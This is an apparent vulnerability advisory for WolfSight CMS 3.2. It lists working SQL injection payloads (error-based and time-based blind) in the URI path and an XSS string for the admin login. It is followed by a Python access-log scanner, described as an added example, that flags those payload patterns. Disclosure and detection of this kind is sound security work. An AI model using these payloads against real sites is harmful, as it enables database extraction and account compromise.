WolfSight CMS 3.2 SQL Injection

2018.07.11
Credit: Berk Dusunur
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WolfSight CMS 3.2 - SQL Injection
# Google Dork: N/A
# Date: 2018-07-10
# Exploit Author: Berk Dusunur & Zehra Karabiber
# Vendor Homepage: http://www.wolfsight.com
# Software Link: http://www.wolfsight.com
# Version: v3.2
# Tested on: Parrot OS / WinApp Server
# CVE : N/A

# PoC Sql Injection

# Parameter: #1* (URI)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx

# PoC Cross-Site Scripting

# http://ip/admin/login.php
# Username <IMG SRC=ajavascript:alert(aEZKa);a>

# This vulnerability was identified during bug bounty
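
The log scanner below is an added example, not part of the original advisory or the vendor's code. It flags the URI-path patterns seen in the two SQL injection payload types above when they appear in web server access logs; the Common Log Format, the signature names, the function name `scan_line` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Signatures derived from the two payload types in the advisory.
# They run on the percent-decoded request path as raw bytes, so the
# invalid multibyte prefix (%bf%bf) stays visible instead of being replaced.
SIGNATURES = {
    "error-based (FLOOR/RAND GROUP BY)": re.compile(rb"floor\s*\(\s*rand\s*\(", re.I),
    "schema enumeration": re.compile(rb"information_schema", re.I),
    "time-based blind (SLEEP)": re.compile(rb"\bsleep\s*\(\s*\d+", re.I),
    "quote breaking out of path segment": re.compile(rb"'\s*(and|or)\b", re.I),
    "invalid multibyte prefix before quote": re.compile(rb"[\x80-\xff]{2}[\"']"),
}

# Request field of a Common Log Format line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; addresses are documentation ranges and the
# second request is abridged from the shape of the advisory's payload.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jul/2018:10:01:02 +0000] "GET /page1-about-page1/ HTTP/1.1" 200 5120
198.51.100.9 - - [10/Jul/2018:10:02:10 +0000] "GET /page1-%bf%bf%22-page1/'%20AND%20(SELECT%207988%20FROM(SELECT%20COUNT(*),FLOOR(RAND(0)*2)x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1" 500 312
198.51.100.9 - - [10/Jul/2018:10:02:31 +0000] "GET /page1-%bf%bf%22-page1/'OR%20SLEEP(5)%20AND%20'kLLx'='kLLx HTTP/1.1" 200 5120
198.51.100.12 - - [10/Jul/2018:10:03:00 +0000] "GET /news/rock-and-roll-floor-plan/ HTTP/1.1" 200 2048
""".splitlines()


def scan_line(line):
    """Return sorted names of signatures matched by the request path of one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    # The advisory's injection point is the URI path, so drop any query string.
    path = unquote_to_bytes(match.group(1).split("?", 1)[0])
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(path))


if __name__ == "__main__":
    for number, entry in enumerate(SAMPLE_LOG, start=1):
        hits = scan_line(entry)
        if hits:
            print(f"line {number}: {', '.join(hits)}")
```

Matches are triage leads for review alongside response codes and response times, since a 5-second response to a SLEEP(5) request is the stronger indicator that the statement reached the database.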


Copyright 2018, cxsecurity.com